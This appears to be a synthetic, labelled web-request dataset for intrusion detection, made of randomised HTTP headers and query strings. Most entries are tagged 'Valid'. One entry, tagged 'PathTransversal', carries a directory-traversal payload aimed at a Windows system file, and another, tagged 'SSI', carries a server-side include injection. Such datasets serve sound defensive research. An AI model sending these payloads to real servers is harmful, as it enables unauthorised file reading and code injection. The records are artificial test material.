GET /lntiUuie6hseeed/dZMP6B.258t/ar0ehmAohan3psa/tPiKc1bbS/bSatAc/lfaosii/esye62/rnRHdvuptf6etrwNtpip/dl1R24noGawcpuwber/xZnhd7ooaoIti.htm?sShcM=eyODqlaA&ytnd=f+ern+R&tnfte79nmEdo=Eexi&.positionoLservicesr3s=q+t&innlgiedoo=N8xhcdginsertupsoWgdmTm+T&h0r=dHi&Ce0elHIeozEhcvi=60103&idYTZbq=cuhi%3DLnc%3Esystemascriptbiustyle%24c&l3eoDxfb16P=%7E+5rechotechod%5Ct+0d HTTP/1.0
Host: www.drrehdelH.de
Connection: keep-alive
Accept: audio/*, audio/basic;q=0.0, video/quicktime;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: identity, compress;q=0.6, compress
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 134.203.218.183
Cookie: weo=zt:ie[j7e oweo wzu;1aouktriO=3;eihgta68h=ctan;oO08tts=83353;tid=heeh1bUNL(doincludeo7location;h457=twls0a
Cookie2: $Version="5"
Date: Mon, 17 Dec 07 11:19:49 GMT
ETag: W/"lah1mwcGBsgDoEZ"
Expect: sp4siceo
From: issst@tutqrpd.biz
If-Modified-Since: Tue, 08 Jan 08 01:58:43 GMT
If-Unmodified-Since: Mon, 16 Feb 09 17:02:24 GMT
If-Match: *
If-None-Match: "XYt9r1aIgp.OL8PIsJ"
If-Range: Wed, 27 Oct 04 02:54:01 CET
Max-Forwards: 807
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Basic YmVlM3k6eFR4YQ==
Range: 0480-
Referer: http://www.byauhBo.org/vra9hdrn/ssralns/wllllAl/5nOi8lht.exe
TE: chunked,chunked
Trailer: If-Match
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 7.5; ts-u4; rv:5.0.8) Gecko/88222026
UA-CPU: MIPS
UA-Disp: 896,6607,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/2.5 20.240.68.174
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 170.190.112.43
X-Serial-Number: 70032554284651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13589
Start - Id: 19929
class: Valid
GET /ewIovBoa/1_a7jud2rHJ5y/tf6ikbX/hM6rmWxHo/syA/EEamHhiaeewf/zO2ctkfRThr1St.htm? HTTP/1.0
Host: 240.11.200.238:83
Connection: theaC
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: ao8fl=iaAeit
Client-ip: 52.13.82.146
Cookie: i6=grsmcied;lewe=qwinnt;ooxi5=esbhqqe<b;raemceeI7Ee=m
Cookie2: $Version="3"
Date: Mon, 05 Feb 07 18:08:19 CET
ETag: W/"GwjE_hsac1rEPL1U@"
Expect: 100-continue
From: eeruearo@0jdeseld5.de
If-Modified-Since: Sat, 20 Feb 10 19:52:16 UTC
If-Unmodified-Since: Thu, 18 Jan 07 12:06:13 GMT
If-Match: *
If-None-Match: *
If-Range: "dclwE-NpS.iv7w0MfQUw"
Max-Forwards: 89
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="4aff8oo"
Authorization: Basic ZGVtaW5Cb246cjdhZVR1Y3c=
Range: -938127,36370-,-5
Referer: http://www.hA23o71S.it/ue6citht/d660eesl/luts34.zip
TE: trailers,deflate,deflate
Trailer: Via
User-Agent: nciiuae (eCLOAmKN; tg-JEkCxI; s4tC93h8I; 8-82cFHZE)
UA-CPU: x86
UA-Disp: 611,1277,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 756x2638
Via: tfode0/3.4 153.36.41.210, 1.0 130.150.130.58
Transfer-Encoding: deflate
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19929
Start - Id: 22680
class: Valid
GET /stw7ner1nooethcis/5vGNca5VgLcKb0xCUg2m/8yaoolef7ave/EAh/5GNLE1h@dQWFEu8/eDa2yoUYKtsb/ReLnvr9uodelO1isgNed.php3?neog=holsftroaklna+o&8iol=4Tw7wQCORb&Y49gzV24-Wr=94043&Etyihfex=90&eb6ersq7rcu=690&7ylrd8=V9oete2&sk=9348157&Ld4K9B=ersbeeinvbndrsohe&tandwW=7897093235&siszo=mhttp&th5tezlcoza=c%40u0se&e9MciJhwhh=818&_2GslpassthruLMlogb=+e HTTP/1.1
Host: www.NeRoneaw.com
Connection: Llhl
Accept: */*
Accept-Charset: iso-10646-ucs-2, windows-1252
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 140.201.37.237
Cookie: rmh42Hai=jWtaE;dtheeisa1NoeI=7331
Cookie2: $Version="1"
Date: Thu, 21 Oct 04 06:34:42 CET
ETag: "gbdP5ZibbybHhy1cO"
Expect: annonel
From: ohhR@ti5t.uk
If-Modified-Since: Tue, 15 May 07 10:15:45 UTC
If-Unmodified-Since: Tue, 21 Jun 05 05:36:08 UTC
If-Match: "cXZhHFaYbnelJNq"
If-None-Match: "SUfgSusetmOJvNB"
If-Range: Thu, 24 Sep 09 09:04:41 UTC
Max-Forwards: 0
MIME-Version: 8.2
Pragma: 2ao=l68ri
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Basic NnJxc3Q2c286YTF0RW95
Range: -29,25075-,866-349335
Referer: /uzcOt/cjhp/dNztna2t/sdenO/seyrjcD.png
TE: deflate,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: t5To9m/5.6.1.4.5
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0084x738
Via: HTTP/1.3 www.vrotoO.jpeg, tgr/5.6 www.atni.css:98, HTTP/1.0 90.24.240.30
Transfer-Encoding: gzip
Upgrade: ksDigc/5.0
Warning: 339 www.8cxlJeOf.htm "y9hruhNaeio8rni" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22680
Start - Id: 25985
class: Valid
GET /eIoVfROuAaW098ydyXeI/a1rYmI4mz40U2/eu6cfj/Yz7autoexecVFbSPx/Ui/iqais9zodarsh2Yt/bh73aAesg2jeaalwaa/2v8nnmepR56GosfeIhpr/khtarcio/s4le.php3?he=0601601&sbtruuNtoescSr=w2Mnr6%29ia7eei&atRhphzboq4l5=o0t&l7aenTnce=5q8%40oRS3o%402&optscriptTjoptgi9lfw=dueo9ennro5l7h&niad2lwyk2E6=ax9ttHuh46&ftth1zeWDqnswsm=tLve&2stwrL=483&1nSDFG=298 HTTP/1.0
Host: 148.128.4.131
Connection: keep-alive
Accept: image/*;q=0.3, audio/*
Accept-Charset: windows-874, ks_c_5601-1987;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 30.171.51.177
Cookie: w4BmQbuQZdeleteq=953803758;cp=042753507;39teleuotao=30
Cookie2: $Version="424"
Date: Wed, 18 May 05 19:58:56 CET
ETag: W/"tNOlPNHZn5V6dUhMqh"
Expect: 0bxnik6=e4f2
From: DTqDe@hek6bsSofn.biz
If-Modified-Since: Fri, 22 Jul 05 06:23:32 GMT
If-Unmodified-Since: Thu, 17 Mar 05 01:50:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3782
MIME-Version: 1.5
Pragma: Rtnn=epy
Proxy-Authorization: NTLM MWVsYTVjY2lFcjlvc2VFc3plZmVVaGdyZWJpbGFhZXJzb25lZUVzQTRs
Authorization: Basic bkFyNnJhajphcmV6bw==
Range: 4-,8-035554
Referer: /loeD/es9t61e1.gz
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.1 (X11; U; Linux i586 1.7; 6R-sh; rv:2.3.8) Gecko/48157962
UA-CPU: Sparc
UA-Disp: 199,4987,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 786x606
Via: 1.5 www.paymnwn.htm:761
Transfer-Encoding: identity
Upgrade: oIh/8.7
Warning: 851 59.120.70.126 "essheecf4tke" "Wed, 15 Nov 06 21:39:56 UTC"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25985
Start - Id: 36180
class: PathTransversal
GET /eAmAZfpIHtP2Ya109a/s0Tx/sowsiheisF8nn/cjE.pl?3JchildO=cro2eqrcl9ises&iei4sml42oe4r=tbwhereelscs%26ie&eizodteuiePe=388&frsssInuoe=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&nntJs8aieisue=lu1e&wEou=1kE1Iod&dorepobt5h4tn=tshAeN7rhtacces HTTP/1.1
Host: www.hhai.be
Connection: w5a2otw
Accept: text/xml;q=0.5, application/rtf;q=0.0, application/x-tar;q=0.7
Accept-Charset: iso-8859-9;q=0.1
Accept-Encoding: *
Accept-Language: dmhhe-ilnis0O;q=0.1, in5r-T, wefl-we
Cache-Control: min-fresh=8058
Client-ip: 164.124.198.233
Cookie: hJevtlhaott=70512055;eedr4EmO=o]ae$;2W1juoWXlocation7=2942
Cookie2: $Version="19"
Date: Sat, 23 Jul 05 16:04:29 GMT
ETag: "3ylimbTILOvC4rZIZ"
Expect: oss8oa
From: hseoct@sy2ts.fr
If-Modified-Since: Mon, 14 Nov 05 23:19:34 GMT
If-Match: "-M4HgsDwz.LEKgF"
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 4.5
Pragma: ar838e=e
Authorization: Digest cnonce="g1eaaho"
Referer: /mfsqc4e/Ereici/igardueE.jpeg
TE: chunked;q=0.5,gzip;q=0.0
Trailer: Authorization
User-Agent: Mozilla/4.2 (X11; U; Open BSD i586 6.6; lr-to; rv:9.8.8) Gecko/95643701
UA-Disp: 608,426,32
UA-Pixels: 0116x5631
Via: tt9he/7.2 25.200.187.170, HTTP/9.7 13.73.226.230:5436
Transfer-Encoding: identity
Upgrade: yio/9.6, huzje/3.6, uaeeO/6.2
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36180
Start - Id: 9145
class: Valid
GET /nrt3oi4tlofc/niioemcsssasq/ra/iCF36ealT2w9-ov/cL_su_01QM0K.gif? HTTP/1.0
Host: www.Ecxs.de:80
Connection: keep-alive
Accept: application/*, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=73761
Client-ip: 251.36.56.29
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="259"
Date: Mon, 19 Jan 09 07:14:38 CET
ETag: W/"Olimrl8N8EDcthct"
Expect: 3DaoR=cdZmk;nmel=d5XH3
From: eoykeh@pmat.fr
If-Modified-Since: Tue, 13 May 08 06:41:41 GMT
If-Unmodified-Since: Mon, 02 Aug 04 11:09:35 GMT
If-Match: "iMcZzGTq-_zcG@rf5Jn"
If-None-Match: ".cDP-dDU-nt3peg"
If-Range: "qoWy-BZfPBNOEyJO"
Max-Forwards: 02
MIME-Version: 9.1
Pragma: Nnerpacb=s
Proxy-Authorization: Digest qop=fe4a
Authorization: Digest algorithm=MD5-sess
Range: -7586
Referer: http://sRrw.fr/rvIpbe/mjeo4qts/oi0cao/ebEewZe.jsp
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.5 (X11; U; Linux i586 3.2; si-al; rv:9.6.1) Gecko/31643993
UA-CPU: MIPS
UA-Disp: 104,519,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0794x264
Via: 5.7 60.154.78.116, FTP/2.0 www.ntiian.shtml, ncd/6.1 80.110.3.107
Transfer-Encoding: deflate
Upgrade: mapEt/8.1, RNae/5.1
Warning: 310 109.122.74.194:1 "lwTr" 
X-Forwarded-For: 177.251.149.163
X-Serial-Number: 688483710117371
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9145
Start - Id: 15616
class: Valid
GET /hYbtJOVdH/vwM.tiff?eoulTadegevsnhh=nsOUYJFUX&Ehee=3ANLH2s HTTP/1.0
Host: www.rhrradr5on.biz
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-2;q=0.3, utf-7, isiri-3342, koi8-r;q=0.2, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 74.161.127.168
Cookie: ehyinpzh=0;ieonw=iQzU0Me;z0Worp=com8opddnnh
Cookie2: $Version="1"
Date: Tue, 25 Jul 06 23:06:53 UTC
ETag: W/"12NQOr7jXUOXeYr"
Expect: rMtet3ay=trlvn
From: tre3@eoezisahr.net
If-Modified-Since: Thu, 05 Nov 09 04:54:06 UTC
If-Unmodified-Since: Tue, 04 Jul 06 17:59:26 UTC
If-Match: "8zLLheUh0jZHxt@"
If-None-Match: "vhmh6.I@2TZupjED"
If-Range: Tue, 22 Mar 05 09:22:11 UTC
Max-Forwards: 16
MIME-Version: 4.4
Pragma: fie=edj
Proxy-Authorization: Basic bXR2Z24zOmx0NnI=
Authorization: Digest response="73F0b75A16812dFCAB7C1fe40cA1C526"
Range: 3-,76842-90
Referer: http://www.ckeoenri.ch/LefstyrU.wav
TE: deflate;q=0.2,gzip;q=0.9
Trailer: Accept-Charset
User-Agent: orietrosToraem
UA-CPU: x86
UA-Disp: 4613,6717,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3825x476
Via: 1.2 222.229.1.197
Transfer-Encoding: identity
Upgrade: wagrj/9.0, xsoib/3.9, oxc/5.1, eEt/3.6, EE0sh/2.7
Warning: 222 www.0iel.jpeg:95 "owrAeinasr5" 
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 15616
Start - Id: 16076
class: Valid
GET /es.2ul.x1ktgH9B8f8/nwRQbQvm4E/ONgY5ED9u9farcpF.html?tuTwut=24562 HTTP/1.0
Host: 43.228.166.132
Connection: qcri
Accept: audio/*;q=0.6, image/*
Accept-Charset: iso-8859-1
Accept-Encoding: gzip, compress;q=0.1, identity, deflate;q=0.3
Accept-Language: *;q=0.4
Cache-Control: max-age=61
Client-ip: 249.104.21.13
Cookie: cAejTsetn=%ucnate0aebe;IMEnAW4TRllQ=nTqvWeXl
Cookie2: $Version="69"
Date: Thu, 09 Nov 06 05:22:18 UTC
ETag: W/"ApfOI3w6CCHMrvz5P4"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Sun, 04 Jan 09 05:55:24 UTC
If-Unmodified-Since: Fri, 05 Aug 05 04:53:31 GMT
If-Match: "8_bz3rzl1yM@A566M1O"
If-None-Match: "T4yDyJrcO-1SE_7DS"
If-Range: Mon, 23 Feb 09 14:34:36 CET
Max-Forwards: 5116
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="Sas09gl4"
Authorization: Basic bmh3YWR1cjpuaWZuNXM=
Range: -84,27-038,192411-63468
Referer: /giibee/nyn1neni/eNs1/esid.swf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/8.8 (compatible; niFme; Open BSD i586; emko)
UA-CPU: x86
UA-Disp: 489,939,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 892x2376
Via: 3.7 235.93.251.145, 4.3 www.Wcp4dtEt.tiff
Transfer-Encoding: lnutrp; A2Th=6aiw
Upgrade: e0aek/2.5, nsh/9.2, iYce/9.7, rnSre/1.5, oat/7.7
Warning: 947 237.230.136.104 "emhixriherlerH7tA" "Fri, 12 Jan 07 18:24:13 UTC"
X-Forwarded-For: 10.132.59.91
X-Serial-Number: 6495346475
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16076
Start - Id: 16785
class: Valid
GET /o1Siaa/aixfosspwL/G4tmpvl/1mwlzR8aeRQgoZGQT9J.jpg? HTTP/1.1
Host: 58.234.100.107
Connection: kdao
Accept: application/x-tar;q=0.1, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 226.239.54.117
Cookie: pqd=]o:qhevi;oalpsznA=8564;at=?tS  'c7an3connect;eetntInqei7eb9=clxnyg|dprocessing-instructionr
Cookie2: $Version="90"
Date: Tue, 03 Aug 04 01:44:22 GMT
ETag: "WA81wnCTFb8KE9xI0eL6"
Expect: 100-continue
From: a2jc@3Dx4eae.st
If-Modified-Since: Wed, 11 Feb 04 24:25:58 UTC
If-Unmodified-Since: Tue, 30 Sep 08 15:22:22 CET
If-Match: "9GnWJjqNOZwI7CDya"
If-None-Match: *
If-Range: *
Max-Forwards: 817
MIME-Version: 0.6
Pragma: eT=eiwTeh
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: di9m iJo2=fseyces
Range: -8,8006-,-51094
Referer: http://snilt8sp.org/yisrt/unP0asc/eaell.avi
TE: gzip;q=0.3,deflate;q=0.0,gzip;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 4.9; iT-Hh; rv:8.8.1) Gecko/67991352
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 561x3269
Via: HTTP/4.0 www.deepdrs.tiff:0769, 0.0 148.40.64.97, sdbra/5.5 69.42.70.213
Transfer-Encoding: compress
Upgrade: rtte/6.2, sdt/4.5, rianin/5.6, eelurI/6.7
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 126.157.223.224
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16785
Start - Id: 27223
class: Valid
GET /aPPPytEZ/tkcxHyWbew/kjvar2raPexecR/8rlksiabft.jpeg?dnax=446&ve7rTShAsohwen1=921 HTTP/1.1
Host: 232.198.228.78
Connection: scbI
Accept: application/postscript, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: usino-osgj;q=0.9, k-2;q=0.7, eomsYyb5-uttbp, 7c-lwn;q=0.8
Cache-Control: min-fresh=7
Client-ip: 118.249.27.115
Cookie: ron=gsDtlYts;Tae=a0>scphooaoR$i;
Cookie2: $Version="0"
Date: Thu, 21 Sep 06 13:46:27 CET
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: 100-continue
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Mon, 17 Aug 09 03:32:28 CET
If-Unmodified-Since: Mon, 02 May 05 02:25:12 CET
If-Match: "BKrLZFCSf-1KwBt-"
If-None-Match: *
If-Range: Wed, 20 Jan 10 02:17:36 GMT
Max-Forwards: 15
MIME-Version: 1.9
Pragma: t9thdrT=eu
Proxy-Authorization: NTLM c3Jja3ZsZDJsbGF3aTAxYzdydGUwb2hlbmxjMjRtY3Roc3JUdW8=
Authorization: NTLM aGVIbjBzczRld29qNVRzZGVpZW1lc1NuN3VhaGdrZWk=
Range: -916,-3,-01
Referer: /gusdii/sokepo/inbnt3h/odh9O6E.jpg
TE: trailers
Trailer: If-Match
User-Agent: tCao8bGzXY http://www.Nieu0.com
UA-CPU: 68000
UA-Disp: 451,9242,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: FTP/0.5 www.eluen6.jpeg, HTTP/6.7 145.65.228.189:0590, 7.8 23.120.164.9
Transfer-Encoding: deflate
Upgrade: sbed/3.7, glaooe/8.8, e2we/2.7
Warning: 835 www.m2d4agn.js "taAuwqnEarwaTzZ" "Sun, 08 Feb 04 21:03:10 GMT"
X-Forwarded-For: 20.1.206.31
X-Serial-Number: 907247306873
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27223
Start - Id: 16606
class: Valid
GET /lYndw6xh/ndbpzeueeimcecserb.html?eaese42f4a=%293frstoei2dp%3Bie HTTP/1.0
Host: www.aD3ko3y.biz
Connection: keep-alive
Accept: audio/basic;q=0.6, video/*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=7
Client-ip: 148.10.195.47
Cookie: sxtermb@=z4eroalra
Cookie2: $Version="6"
Date: Fri, 07 Jul 06 10:21:21 UTC
ETag: "dP@cVrOnf6RldbCGxPY"
Expect: 100-continue
From: dwou@hguthnrf9e.org
If-Modified-Since: Fri, 18 Aug 06 01:53:32 UTC
If-Unmodified-Since: Thu, 08 May 08 22:25:12 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 3
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="rpsns9"
Authorization: Digest nonce
Range: 872-,754-,4693-
Referer: /mehtebtz/swit/TaatNop/t2h1/eOn3Ht.tiff
TE: trailers,gzip;q=0.4
Trailer: Connection
User-Agent: mh5yt9 (sQpE4F; sgf6ulAdW)
UA-CPU: StrongARM
UA-Disp: 049,0120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1536x5641
Via: FTP/2.8 www.Nirueo.png
Transfer-Encoding: deflate
Upgrade: Nca/5.9, s4h/1.3
Warning: 105 www.Ia3bwst.html "meseeoOE" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16606
Start - Id: 3097
class: Valid
GET /Ed8sacvseeo/h0u9-vlCa5sJzV/tircc76mn7trroIehed/yrK31hA4C7.Hvqh/eus@m@2iBsPemE_Fn535/49njIGZi5Q1SIm1.asmx?69jiosevjaor8nt=i7pxtermJunr+%3FLkhu&ihn6ejekrd0=7082490&izunbne7as=tthEh2igsooet&oocgeotTvba5u=5&iriaeeenu=591&erlsaa6faaodsOa=nW1FTtS&eia0Kr9f1iii=sq0cz2XQ8UwX HTTP/1.0
Host: www.3Tsh8.de:80
Connection: Eeir
Accept: audio/*, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ittw-e;q=0.6
Cache-Control: no-cache
Client-ip: 61.195.68.235
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="807"
Date: Mon, 26 Jul 04 14:03:11 GMT
ETag: W/"uHGKV8CrIhA@9Y9gg4QB"
Expect: 100-continue
From: ssmefI@deee3y.biz
If-Modified-Since: Tue, 22 Feb 05 21:24:25 UTC
If-Unmodified-Since: Fri, 31 Aug 07 18:57:31 GMT
If-Match: "W9xO.U_sHoYx@fLmC5"
If-None-Match: "wkE@lEd2GsBQHuoPH6zY"
If-Range: "zg5r@pHS@9kdWEfdM"
Max-Forwards: 15
MIME-Version: 0.4
Pragma: hnoPl=66ei
Proxy-Authorization: Digest username="endc"
Authorization: tmnhn2 Hesd=eaaahsa
Range: 09475-2,6992-
Referer: /nihmilep/Astsnto.mdb
TE: gzip,deflate,deflate
Trailer: Upgrade
User-Agent: Mozilla/7.6 (compatible; MSIE 2.5; Solaris; eehs36u; yeraa4)
UA-CPU: MIPS
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: 9.8 98.192.179.92, 5.5 www.st9aal.html
Transfer-Encoding: identity
Upgrade: ket/3.8, j3t/3.2
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 315450013052387
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3097
Start - Id: 9347
class: Valid
GET /tttoaxjhCh0tnschfG5/poVXruHoBPCMxJC7n/rRtxxSYjG9XjoqlAl/clsrmrehda/mrhNmh8M0aOy/8tg/wurcP7m1qIKnC/dzsoasvtttom/wewOvNw7iBMU/momDUY2CbFUJ@eX.php3?tst=5047451 HTTP/1.1
Host: 112.96.15.49
Connection: tqb3
Accept: audio/basic, text/*
Accept-Charset: iso-8859-8, windows-1254;q=0.6, iso-10646-ucs-2, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=23
Client-ip: 66.193.65.107
Cookie: ema=25976;norvi=64144779;eanutmo=bKKZGo2E;50estooaa0lh=bktYmVXWHG;w9of=59521825;dsg=(EEe<bn]pls5ghif3cmdboot.inie
Cookie2: $Version="698"
Date: Sat, 25 Mar 06 23:02:35 GMT
ETag: W/"xvhS.zI0ihkfRaPDDYqq"
Expect: gEwhEed=lqmenxb
From: hwtSu76@kdazi.net
If-Modified-Since: Sat, 14 Feb 04 02:33:51 GMT
If-Unmodified-Since: Thu, 25 Oct 07 03:21:16 GMT
If-Match: ".-p0TSfzveXjqr1Z@2WI"
If-None-Match: *
If-Range: *
Max-Forwards: 838
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: ud0w tNdb=terh
Authorization: Digest nonce
Range: -41,91189-8,552-
Referer: http://hyeit.com/8qt2tef/8mbe/hanabt.tar.gz
TE: deflate
Trailer: Accept-Charset
User-Agent: e3Ioi7b1a
UA-CPU: Sparc
UA-Disp: 4558,749,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 9.0 191.75.64.92
Transfer-Encoding: compress
Upgrade: iwh/2.5, obqr/2.1
Warning: 709 17.102.2.9 "acKn" 
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 547937041185826095
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9347
Start - Id: 26453
class: Valid
GET /hEmlbdgatab/eEQnXy-DuSsV11/6th4e/luWelimsa1/lT0h@8B/6varVHxsUk/ognsrplsd6/BR4tandxs4DVd/vaViX9oA98xQvx61GPsu/ne6ngla4eOlyro/rxILGlF6QF/s_gp4.jsp?aUHkWekaNhttpbj=otecdh04lyMnrsagnO&e9lmnueRnem=98718&rfr2n6n5iht=36&omochaVhome=tmp%3Ar%5Ddiv5hepD&2yw1whue9nmctd=0064054&optTB5rLOgroup byRBP=neonb4e0tlni&9tob1oej=1565479&kq5xurI=ftoLlynmbiesr&es=S&etioe3r=22&eEisOata=te&b8EzV=scopycls&iei4dhi58=67664367 HTTP/1.1
Host: 65.190.85.137
Connection: keep-alive
Accept: image/*, audio/basic;q=0.1
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: sdC1-rmavbe;q=0.4, dsolrx-oa;q=0.9, ig0-28be, 7nors0o-o;q=0.9
Cache-Control: no-store
Client-ip: 14.76.173.109
Cookie: mtsNn=ya0;eEiuca4n=41824155;vrli7hg3dPeceqn=]bssliba]4hnandaall2tIbetweene;ZnflNeEn==rn;rpboUd=96;G@x7OuJimDe=cMsUh
Cookie2: $Version="56"
Date: Sun, 13 Mar 05 14:40:58 CET
ETag: W/"aH2jp.pfySLbmKqBQ"
Expect: c3aYiyb
From: d0ne5@ieig.org
If-Modified-Since: Wed, 15 Jun 05 20:19:55 CET
If-Unmodified-Since: Sat, 19 Feb 05 18:56:02 GMT
If-Match: *
If-None-Match: "K_5s5psU1oB2-.tMk"
If-Range: "zvbtGWGZjTGL_WP5"
Max-Forwards: 1
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: sBa8 usoowtkA=Sc8Di
Range: 31-37154,2-
Referer: /lamy/8Ii8/ud49S.pdf
TE: trailers,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 9.1; it-fn; rv:8.5.8) Gecko/45262318
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 326x7197
Via: sOi/8.4 195.231.110.54, 2.8 49.89.56.192, 5.1 189.84.34.175
Transfer-Encoding: gzip
Upgrade: rNdech/1.9, n3weni/6.6, NEmr/3.7
Warning: 816 www.aegrtfH.jpg "tmrtheosaoahwt" 
X-Forwarded-For: 189.141.174.39
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26453
Start - Id: 39416
class: SSI
GET /3VuJAR2.@2AJiUQVQp@q.gif?q0u9n=eUx0zrRi9rdhiZis&TedttN=61500647&nUawsmsh=huNo90esmw&y@htpassbODeI=nnJ2UK&aUux=oQxheoniframeqRl0anhs&wdboot.iniZHM-sock_streamS=3vj2zb&Eanso=%2Fnne+6ecoen&44e5DWq=e+or&nriednogvmt21oc=13916205&Sidgsb=dBySBA1VR&iovet=+a&XboQshynw9=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&8tl3aViftdrosef=%25br%3Btf33%29shutdown%5Bhtfiul&izjiicov8vtmH=2eC6 HTTP/1.1
Host: 19.120.233.219
Connection: nNhsehrt
Accept: video/quicktime, video/mpeg, text/plain;q=0.8
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: eea=o
Client-ip: 123.202.136.228
